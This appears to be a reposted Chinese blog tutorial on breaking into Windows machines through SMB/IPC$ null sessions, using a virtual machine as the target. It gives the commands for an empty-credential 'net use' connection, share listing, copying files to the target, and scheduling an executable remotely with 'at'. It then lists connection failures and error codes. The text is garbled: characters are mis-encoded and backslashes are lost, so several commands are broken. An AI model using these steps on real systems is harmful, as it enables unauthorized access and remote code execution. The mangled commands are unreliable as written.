1 SMB:(Server Message Block) Windows協(xié)議族,用于文件打印共享的服務(wù);
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口實(shí)現(xiàn)基于TCP/IP協(xié)議的NETBIOS網(wǎng)絡(luò)互聯(lián)。
3 在WindowsNT中SMB基于NBT實(shí)現(xiàn),即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT實(shí)現(xiàn),還可以直接通過(guò)445端口實(shí)現(xiàn)。
使用虛擬機(jī)模擬被攻擊方電腦:
使用掃描工具對(duì)該被攻擊方電腦進(jìn)行掃描:
1 首先,我們先建立一個(gè)連接(當(dāng)然,這需要目標(biāo)開放ipc$)
命令:net use \ipipc$ "" /user:""
注意:上面的命令包括四個(gè)空格,net與use中間有一個(gè)空格,use后面一個(gè),密碼左右各一個(gè)空格。
命令:net view \ip
解釋:前提是建立了空連接后,用此命令可以查看遠(yuǎn)程主機(jī)的共享資源,如果它開了共享,可以得到如下面的結(jié)果,但此命令不能顯示默認(rèn)共享。(c$,d$,…..)
命令: copy c:*.* \ip共享
命令: net time \ip
解釋:用此命令可以得到一個(gè)遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間。
at \ip time 要運(yùn)行作業(yè)文件的路徑(at \192.168.164.130 c: est.exe)
ipc$連接失敗的常見原因:
1 IPC連接是Windows NT及以上系統(tǒng)中特有的功能,由于其需要用到Windows NT中很多DLL函數(shù),所以不能在Windows9.x/Me系統(tǒng)中運(yùn)行,也就是說(shuō)只有nt/2000/xp才可以相互建立ipc$連接,98/me是不能建立ipc$連接的;
2 如果想成功的建立一個(gè)ipc$連接,就需要響應(yīng)方開啟ipc$共享,即使是空連接也是這樣,如果響應(yīng)方關(guān)閉了ipc$共享,將不能建立連接;
3 連接發(fā)起方未啟動(dòng)Lanmanworkstation服務(wù)(顯示名為:Workstation):它提供網(wǎng)絡(luò)鏈結(jié)和通訊,沒(méi)有它發(fā)起方無(wú)法發(fā)起連接請(qǐng)求;
4 響應(yīng)方未啟動(dòng)Lanmanserver服務(wù)(顯示名為:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依賴于此服務(wù),沒(méi)有它主機(jī)將無(wú)法響應(yīng)發(fā)起方的連接請(qǐng)求,不過(guò)沒(méi)有它仍可發(fā)起ipc$連接;
5 響應(yīng)方未啟動(dòng)NetLogon,它支持網(wǎng)絡(luò)上計(jì)算機(jī) pass-through 帳戶登錄身份(不過(guò)這種情況好像不多);
6 響應(yīng)方的139,445端口未處于監(jiān)聽狀態(tài)或被防火墻屏蔽;
7 連接發(fā)起方未打開139,445端口;
8 用戶名或者密碼錯(cuò)誤:如果發(fā)生這樣的錯(cuò)誤,系統(tǒng)將給你類似于'無(wú)法更新密碼'這樣的錯(cuò)誤提示(顯然空會(huì)話排除這種錯(cuò)誤);
9 命令輸入錯(cuò)誤:可能多了或少了空格,當(dāng)用戶名和密碼中不包含空格時(shí)兩邊的雙引號(hào)可以省略,如果密碼為空,可以直接輸入兩個(gè)引號(hào)""即可;
10 如果在已經(jīng)建立好連接的情況下對(duì)方重啟計(jì)算機(jī),那么ipc$連接將會(huì)自動(dòng)斷開,需要重新建立連接。
另外,你也可以根據(jù)返回的錯(cuò)誤號(hào)分析原因:
錯(cuò)誤號(hào)5,拒絕訪問(wèn):很可能你使用的用戶不是管理員權(quán)限的;
錯(cuò)誤號(hào)51,Windows無(wú)法找到網(wǎng)絡(luò)路徑:網(wǎng)絡(luò)有問(wèn)題;
錯(cuò)誤號(hào)53,找不到網(wǎng)絡(luò)路徑:ip地址錯(cuò)誤;目標(biāo)未開機(jī);目標(biāo)lanmanserver服務(wù)未啟動(dòng);目標(biāo)有防火墻(端口過(guò)濾);
錯(cuò)誤號(hào)67,找不到網(wǎng)絡(luò)名:你的lanmanworkstation服務(wù)未啟動(dòng)或者目標(biāo)刪除了ipc$;
錯(cuò)誤號(hào)1219,提供的憑據(jù)與已存在的憑據(jù)集沖突:你已經(jīng)和對(duì)方建立了一個(gè)ipc$,請(qǐng)刪除再連;
錯(cuò)誤號(hào)1326,未知的用戶名或錯(cuò)誤密碼:原因很明顯了;
錯(cuò)誤號(hào)1792,試圖登錄,但是網(wǎng)絡(luò)登錄服務(wù)沒(méi)有啟動(dòng):目標(biāo)NetLogon服務(wù)未啟動(dòng);
錯(cuò)誤號(hào)2242,此用戶的密碼已經(jīng)過(guò)期:目標(biāo)有帳號(hào)策略,強(qiáng)制定期要求更改密碼。
文章來(lái)源:http://ronaldqinbiao.blog.51cto.com/6606843/1599117